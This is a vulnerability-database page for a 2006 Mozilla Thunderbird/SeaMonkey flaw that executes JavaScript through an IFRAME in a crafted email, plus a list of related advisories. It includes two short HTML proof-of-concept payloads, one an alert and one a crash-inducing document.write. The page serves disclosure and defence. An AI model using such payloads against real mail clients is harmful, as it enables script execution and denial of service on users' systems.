Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbGeorgi GuninskiEDB-ID:27257
HistoryFeb 22, 2006 - 12:00 a.m.

Mozilla (Multiple Products) - iFrame JavaScript Execution

2006-02-2200:00:00
Georgi Guninski
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/16770/info

Multiple Mozilla products are prone to a script-execution vulnerability. 

The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing malicious script code in an IFRAME and the user tries to reply to the mail. Arbitrary JavaScript can be executed even if the user has disabled JavaScript execution in the client. 

The following mozilla products are vulnerable to this issue:
- Mozilla Thunderbird, versions prior to 1.5.0.2, and prior to 1.0.8
- Mozilla SeaMonkey, versions prior to 1.0.1
- Mozilla Suite, versions prior to 1.7.13

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* Denial of service (application crash) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com
!')"></iframe>
</body>
</html>

Related

checkpoint_advisories 1
nessus 24
mozilla 1
openvas 12
ubuntucve 1
cve 1
debiancve 1
cvelist 1
prion 1
freebsd 1
nvd 1
suse 3
centos 3
redhat 2
gentoo 2
ubuntu 1
debian 4
osv 2
checkpoint_advisories
checkpoint_advisories
Mozilla Thunderbird WYSIWIG Engine Filtering IFRAME JavaScript Execution (CVE-2006-0884)
2009-10-28 00:00:00
nessus
nessus
FreeBSD : thunderbird -- javascript execution (61349f77-c620-11da-b2fb-000e0c2e438a)
2006-05-13 00:00:00
Mandrake Linux Security Advisory : mozilla-thunderbird (MDKSA-2006:052)
2006-03-06 00:00:00
SUSE-SA:2006:021: MozillaFirefox,mozilla
2006-04-26 00:00:00
mozilla
mozilla
JavaScript execution in mail when forwarding in-line — Mozilla
2006-04-21 00:00:00
openvas
openvas
FreeBSD Ports: thunderbird, mozilla-thunderbird
2008-09-04 00:00:00
FreeBSD Ports: thunderbird, mozilla-thunderbird
2008-09-04 00:00:00
Gentoo Security Advisory GLSA 200605-09 (mozilla-thunderbird)
2008-09-24 00:00:00
ubuntucve
ubuntucve
CVE-2006-0884
2006-02-24 00:00:00
cve
cve
CVE-2006-0884
2006-02-24 22:02:00
debiancve
debiancve
CVE-2006-0884
2006-02-24 22:02:00
cvelist
cvelist
CVE-2006-0884
2006-02-24 22:00:00
prion
prion
Design/Logic Flaw
2006-02-24 22:02:00
freebsd
freebsd
thunderbird -- javascript execution
2006-02-22 00:00:00
nvd
nvd
CVE-2006-0884
2006-02-24 22:02:00
suse
suse
remote code execution in MozillaFirefox,mozilla
2006-04-20 13:13:08
remote code execution in MozillaThunderbird
2006-04-25 13:15:04
remote code execution in phpMyAdmin
2006-01-26 13:53:52
centos
centos
devhelp, mozilla security update
2006-04-18 17:41:36
galeon, mozilla security update
2006-04-18 23:53:59
thunderbird security update
2006-04-21 17:41:34
redhat
redhat
(RHSA-2006:0330) thunderbird security update
2006-04-21 00:00:00
(RHSA-2006:0329) mozilla security update
2006-04-18 00:00:00
gentoo
gentoo
Mozilla Thunderbird: Multiple vulnerabilities
2006-05-08 00:00:00
Mozilla Suite: Multiple vulnerabilities
2006-04-28 00:00:00
ubuntu
ubuntu
Thunderbird vulnerabilities
2006-05-03 00:00:00
debian
debian
[SECURITY] [DSA 1051-1] New Mozilla Thunderbird packages fix several vulnerabilities
2006-05-04 08:20:07
[SECURITY] [DSA 1051-1] New Mozilla Thunderbird packages fix several vulnerabilities
2006-05-04 08:20:07
[SECURITY] [DSA 1046-1] New Mozilla packages fix several vulnerabilities
2006-04-27 07:08:35
osv
osv
mozilla-thunderbird - several vulnerabilities
2006-05-04 00:00:00
mozilla - several
2006-04-27 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:27257
checkpoint_advisories1nessus24mozilla1openvas12ubuntucve1cve1debiancve1cvelist1prion1freebsd1nvd1suse3centos3redhat2gentoo2ubuntu1debian4osv2